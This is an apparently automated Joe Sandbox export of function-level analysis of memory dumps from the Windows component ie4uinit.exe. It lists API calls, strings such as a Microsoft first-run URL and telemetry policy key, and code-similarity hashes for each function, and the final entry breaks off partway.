Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Crypt$Cert$ErrorHashLastStore$CertificateDestroy$CloseContextCreateFindFreeImportInfoOpenParamPublicSignatureVerify
String ID:
API String ID: 1994448431-0
Opcode ID: e3bbdaa9551d28c78bda82fe27e2def9eade94d7959de9e02ddfd2479a78e0f8
Instruction ID: 8a318659a31e54c259cc899a432fc1f43cf2fca8fc1fb184a4bc843e5e2cfa73
Opcode Fuzzy Hash: e3bbdaa9551d28c78bda82fe27e2def9eade94d7959de9e02ddfd2479a78e0f8
Instruction Fuzzy Hash: 8F41A035E2E64286E7609B29AE807B962A4FB84F84F444134DF4DC265ADF7DE805CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522C2F4 Relevance: 10.9, APIs: 7, Instructions: 421COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

memcpy_s.MSVCRT ref: 00007FF6B522C62C

Part of subcall function 00007FF6B522E150: StrCmpNIA.SHLWAPI ref: 00007FF6B522E214

memcpy_s.MSVCRT ref: 00007FF6B522C81B
memcpy_s.MSVCRT ref: 00007FF6B522C85D
memcpy_s.MSVCRT ref: 00007FF6B522C88F
memcpy_s.MSVCRT ref: 00007FF6B522C8C0
memcpy_s.MSVCRT ref: 00007FF6B522C91F
memcpy_s.MSVCRT ref: 00007FF6B522C986

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: memcpy_s$HeapProcess
String ID:
API String ID: 1569082731-0
Opcode ID: e90e0d939ad4ac896f3863ace0b5f854ec8779e4bb849f516ecffe100afabdff
Instruction ID: 7cfa2dc6b01680dc9bda5f5d3e29a5832e9bf06086c859d247835cabcf218aae
Opcode Fuzzy Hash: e90e0d939ad4ac896f3863ace0b5f854ec8779e4bb849f516ecffe100afabdff
Instruction Fuzzy Hash: 2C125B7661ABC18AE774CB19EA407EAB7A5FB84B80F504125CB8D93B59DF3DD844CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522E80C Relevance: 10.6, APIs: 7, Instructions: 85encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32 ref: 00007FF6B522E83B
memcpy_s.MSVCRT ref: 00007FF6B522E8AA
CryptEncrypt.ADVAPI32 ref: 00007FF6B522E8DE
GetLastError.KERNEL32 ref: 00007FF6B522E8E8
GetLastError.KERNEL32 ref: 00007FF6B522E8F7
GetLastError.KERNEL32 ref: 00007FF6B522E90B

Part of subcall function 00007FF6B522EA9C: memcpy_s.MSVCRT ref: 00007FF6B522EADF
Part of subcall function 00007FF6B522EA9C: CryptCreateHash.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EAFE
Part of subcall function 00007FF6B522EA9C: CryptHashData.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB1B
Part of subcall function 00007FF6B522EA9C: CryptDeriveKey.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB3E
Part of subcall function 00007FF6B522EA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB48
Part of subcall function 00007FF6B522EA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB5C
Part of subcall function 00007FF6B522EA9C: CryptDestroyHash.ADVAPI32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB84

Part of subcall function 00007FF6B522EA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB6B
Part of subcall function 00007FF6B522EA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EB8C
Part of subcall function 00007FF6B522EA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF6B522E85D), ref: 00007FF6B522EBA0

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

GetLastError.KERNEL32 ref: 00007FF6B522E91A

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Crypt$Hash$memcpy_s$CreateDataDeriveDestroyEncryptHeapProcessRandom
String ID:
API String ID: 3055890878-0
Opcode ID: cd35a5b808a29304d299994369722c5ce30c78454dac310cd4c76ff622f3c001
Instruction ID: 9ac65f7d34011d9472f4bb0e4d83013aaa65ada90a545c88089e5c7a9ce7d9fe
Opcode Fuzzy Hash: cd35a5b808a29304d299994369722c5ce30c78454dac310cd4c76ff622f3c001
Instruction Fuzzy Hash: 06316435B19B4686EB208B29E9806AA73A4EF48B80F540035DB8DC7B19DF7DF845D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52144E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39fileCOMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B521450E
FindFirstFileW.KERNEL32 ref: 00007FF6B5214524

Part of subcall function 00007FF6B5213C10: SetFileAttributesW.KERNEL32(?,00007FF6B521477E), ref: 00007FF6B5213C5D
Part of subcall function 00007FF6B5213C10: DeleteFileW.KERNEL32(?,00007FF6B521477E), ref: 00007FF6B5213C68
Part of subcall function 00007FF6B5213C10: SHChangeNotify.SHELL32 ref: 00007FF6B5213C7D

FindNextFileW.KERNEL32 ref: 00007FF6B5214548
FindClose.KERNEL32 ref: 00007FF6B5214555
SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B521455E

Strings

*.{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF6B521451D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: File$Find$CurrentDirectory$AttributesChangeCloseDeleteFirstNextNotify
String ID: *.{871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 2401681968-4084126563
Opcode ID: f1bf1c671c6ef1bfb8823af4c72b8f41b03a8417693c673c4a2b3b410e5d7e6b
Instruction ID: 830f4ac22c8394666ab7c95b8ef7ae56ef37178b6ab7fb6a0b60d9ee21dc728e
Opcode Fuzzy Hash: f1bf1c671c6ef1bfb8823af4c72b8f41b03a8417693c673c4a2b3b410e5d7e6b
Instruction Fuzzy Hash: 14113321609A4285EE609B19FE442B963A4FB48FA0F844231DB6D8779EDF3CE9468740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522763C Relevance: 9.1, APIs: 6, Instructions: 80encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32 ref: 00007FF6B5227683
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00007FF6B52279B1), ref: 00007FF6B522771E

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

CryptStringToBinaryW.CRYPT32 ref: 00007FF6B52276C1
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00007FF6B52279B1), ref: 00007FF6B52276D6
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00007FF6B52279B1), ref: 00007FF6B52276EA

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$BinaryCryptString$HeapProcess
String ID:
API String ID: 3231478326-0
Opcode ID: d19f66ab0da86e25717549e9acd116a2d5483bc06ee371277d1c82c0e560c553
Instruction ID: 6329f6cb5ae23e7344ffc8b54936633b7a41b17dcf4b735e80efba6956f0091e
Opcode Fuzzy Hash: d19f66ab0da86e25717549e9acd116a2d5483bc06ee371277d1c82c0e560c553
Instruction Fuzzy Hash: 16318435B19B418AE7109F2AAE806AA72D4BB84F80F1C4034DB8DC3759EE7DE8418B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5222B50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32 ref: 00007FF6B5225F65
GetLastError.KERNEL32 ref: 00007FF6B5225F6F

Strings

dsp, xrefs: 00007FF6B5222B69
https://ieonline.microsoft.com/EUPP/v1/service?action=needfirstrun&appid=Microsoft_IE_EUPP, xrefs: 00007FF6B5225F98

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CryptErrorLastRandom
String ID: dsp$https://ieonline.microsoft.com/EUPP/v1/service?action=needfirstrun&appid=Microsoft_IE_EUPP
API String ID: 1176002950-197285457
Opcode ID: aad2aff617bec0a7cf2545ca9d18dd7df884f284a2e0012892b6761f194f1e11
Instruction ID: f41628c485eaf5418d43fe68b7a1ec8c2fab6d9b5046f03606d6b4dcf7ed43e9
Opcode Fuzzy Hash: aad2aff617bec0a7cf2545ca9d18dd7df884f284a2e0012892b6761f194f1e11
Instruction Fuzzy Hash: 5C516B27B2AA028AFB20CB29DA443ED23A5BB44B44F544135DF4D9764ADF3EE906C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5227DCC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74encryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6B5227E31
CryptHashCertificate.CRYPT32 ref: 00007FF6B5227E70
memcmp.MSVCRT ref: 00007FF6B5227E9E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,80004005,00007FF6B5227D21), ref: 00007FF6B5227EB4

Strings

, xrefs: 00007FF6B5227E7A

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CertificateCryptErrorHashLastmemcmpmemset
String ID:
API String ID: 2710184173-3916222277
Opcode ID: dd4ecaff4ee33ae978393551f6ac5030382da12282ae5f96ce52156916286347
Instruction ID: d0594f2ff66bbc561ccf88055e165e3ccd3139384c0108c3a14bde3056affac6
Opcode Fuzzy Hash: dd4ecaff4ee33ae978393551f6ac5030382da12282ae5f96ce52156916286347
Instruction Fuzzy Hash: D131813AA19B4186EB64CB19E9402A973A4FB88F80F544136DF4D83759DF3DDD41CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522E750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF6B522E78D
GetLastError.KERNEL32 ref: 00007FF6B522E7B1
GetLastError.KERNEL32 ref: 00007FF6B522E7C5
GetLastError.KERNEL32 ref: 00007FF6B522E7D4

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00007FF6B522E784

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$AcquireContextCrypt
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 515889935-63410773
Opcode ID: 8ac2b268588cf12d4238ff2465cd1088c530efc73a41aada4d763c07ee38a1e6
Instruction ID: 7fc0fad2f3834b95eec09f96436f3e4cef7887b92ca146ec696bfc2240333576
Opcode Fuzzy Hash: 8ac2b268588cf12d4238ff2465cd1088c530efc73a41aada4d763c07ee38a1e6
Instruction Fuzzy Hash: 5A115E14B1A64649FB50A72DAF843F922956F48F80F884534DB4DC65ABEF7EEC05A310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5230204 Relevance: 7.6, APIs: 5, Instructions: 109fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B52190F4: LocalFree.KERNEL32 ref: 00007FF6B5219312

FindFirstFileExW.KERNEL32 ref: 00007FF6B5230279
GetLastError.KERNEL32 ref: 00007FF6B5230288
FindNextFileW.KERNEL32 ref: 00007FF6B5230353
GetLastError.KERNEL32 ref: 00007FF6B523035D
FindClose.KERNEL32 ref: 00007FF6B5230392

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstFreeLocalNext
String ID:
API String ID: 2978595652-0
Opcode ID: b82eed9b9ad028baa882b3f5c7fe9305f8cbf1c90736e26fe2ca5e54320822eb
Instruction ID: 8232a90fd63456ab65c6e23a79f30fe9d6558f7102f8212ce7ab5c7c1a640b60
Opcode Fuzzy Hash: b82eed9b9ad028baa882b3f5c7fe9305f8cbf1c90736e26fe2ca5e54320822eb
Instruction Fuzzy Hash: 6B419321A0A6828AE7359B6DAE403FA73A0EB44B54F400132EB5DC659EDF7CEC45C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5217758 Relevance: 6.2, APIs: 4, Instructions: 241threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6B5217859
memset.MSVCRT ref: 00007FF6B52178A8
IsDebuggerPresent.KERNEL32 ref: 00007FF6B521794A
OutputDebugStringW.KERNEL32 ref: 00007FF6B52179D7

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThreadmemset
String ID:
API String ID: 3402966819-0
Opcode ID: 8115dcb7fee6dcef3782b57c650c0587db40e5c68cf5ca962254d4a6c13c2ef5
Instruction ID: ddbf54201f36f13a77be36e18b50825427a5b77965f272ec85d5f5e4498a9f6e
Opcode Fuzzy Hash: 8115dcb7fee6dcef3782b57c650c0587db40e5c68cf5ca962254d4a6c13c2ef5
Instruction Fuzzy Hash: 11B15F22E0AB5285EB619B19ED403AA77A0FB84F80F084035DB4D8779ADF7DED45C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52256A4 Relevance: 6.1, APIs: 4, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32 ref: 00007FF6B52256EA
CryptBinaryToStringA.CRYPT32 ref: 00007FF6B522571D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B52262D9), ref: 00007FF6B5225727

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: BinaryCryptString$ErrorLast
String ID:
API String ID: 1952235381-0
Opcode ID: 78d356d05688388b1fc995cd7e19392f7fea885e563c701190838725c4503d30
Instruction ID: 26398db51422f996fd9746128cca79d14ac35a6578a0dac1e17e28eb1a741454
Opcode Fuzzy Hash: 78d356d05688388b1fc995cd7e19392f7fea885e563c701190838725c4503d30
Instruction Fuzzy Hash: AF219835B09B42C6E7109B59AA803BA62A4BB44F90F548135DB8DCB65DEF3EE8518700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522EBE0 Relevance: 6.0, APIs: 4, Instructions: 40encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32 ref: 00007FF6B522EC20
CryptDestroyKey.ADVAPI32 ref: 00007FF6B522EC34
CryptDestroyKey.ADVAPI32 ref: 00007FF6B522EC48
CryptReleaseContext.ADVAPI32 ref: 00007FF6B522EC5E

Part of subcall function 00007FF6B5211698: GetProcessHeap.KERNEL32 ref: 00007FF6B52116A5
Part of subcall function 00007FF6B5211698: HeapFree.KERNEL32 ref: 00007FF6B52116B3

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Crypt$Destroy$Heap$ContextFreeProcessRelease
String ID:
API String ID: 4130806261-0
Opcode ID: 8a00a3ff903416d7b0f59f5c999b27ac69b7c41e41eea4974ae6d114375c7343
Instruction ID: 39b77577f0b4f0bce5afbbdb75dc48f36ce4503f2ee76d08fe7f930ff66a4bbc
Opcode Fuzzy Hash: 8a00a3ff903416d7b0f59f5c999b27ac69b7c41e41eea4974ae6d114375c7343
Instruction Fuzzy Hash: 8F110C27A176098AFF699FA9CAA53B92364FF44F09F040534CB0E8954ACF7EE845D340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522DBC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B522FDB4: LoadLibraryExW.KERNEL32 ref: 00007FF6B522FE2D
Part of subcall function 00007FF6B522FDB4: GetProcAddress.KERNEL32 ref: 00007FF6B522FE45
Part of subcall function 00007FF6B522FDB4: NtQueryLicenseValue.NTDLL ref: 00007FF6B522FE71
Part of subcall function 00007FF6B522FDB4: FreeLibrary.KERNEL32 ref: 00007FF6B522FEE1

NtQueryLicenseValue.NTDLL ref: 00007FF6B522DC7B

Part of subcall function 00007FF6B522F9DC: LoadLibraryExW.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF6B522DC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF6B522FA0E
Part of subcall function 00007FF6B522F9DC: GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF6B522DC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF6B522FA26
Part of subcall function 00007FF6B522F9DC: GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF6B522DC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF6B522FA39
Part of subcall function 00007FF6B522F9DC: FreeLibrary.KERNEL32 ref: 00007FF6B522FB7E

Part of subcall function 00007FF6B522F988: RegGetValueW.ADVAPI32 ref: 00007FF6B522F9C1

Strings

AllowTelemetry, xrefs: 00007FF6B522DC0E
Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection, xrefs: 00007FF6B522DC1C

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Library$AddressProcValue$FreeLicenseLoadQuery
String ID: AllowTelemetry$Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection
API String ID: 1629355636-1682735051
Opcode ID: 8268b63e672efe111997523745741943a386734e04c4eab3cbdef3fce30538bf
Instruction ID: 7495eab9bda6767f122d20ce9ba33c2a9ff57cfc8efc6e0adad7b97b6ebf2a25
Opcode Fuzzy Hash: 8268b63e672efe111997523745741943a386734e04c4eab3cbdef3fce30538bf
Instruction Fuzzy Hash: 11319677A156529EF7118E68CE805E92795BF40B68F504131EF0D8298EDFBAEC8AC340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521329C Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6B52132E2
GetVersionExA.KERNEL32 ref: 00007FF6B52132EC

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Versionmemset
String ID:
API String ID: 3136939366-0
Opcode ID: f26bee8d05a445e1c7e8155c44e4478685e11a1403462e41dbe05f32c3ee5bcb
Instruction ID: aa05e58bbe3e9e5bf8ba71dfd34caa50e210b6dafcfcb4d2f767e66a773a816d
Opcode Fuzzy Hash: f26bee8d05a445e1c7e8155c44e4478685e11a1403462e41dbe05f32c3ee5bcb
Instruction Fuzzy Hash: 4021A722A29AD282E7708B19F9147EE73A1FB99B40F455135EB8D8365EDF3DD8048B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52225C0 Relevance: 3.1, APIs: 2, Instructions: 60encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

CryptAcquireContextW.ADVAPI32 ref: 00007FF6B5222603
CryptReleaseContext.ADVAPI32 ref: 00007FF6B5222666

Part of subcall function 00007FF6B5211698: GetProcessHeap.KERNEL32 ref: 00007FF6B52116A5
Part of subcall function 00007FF6B5211698: HeapFree.KERNEL32 ref: 00007FF6B52116B3

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
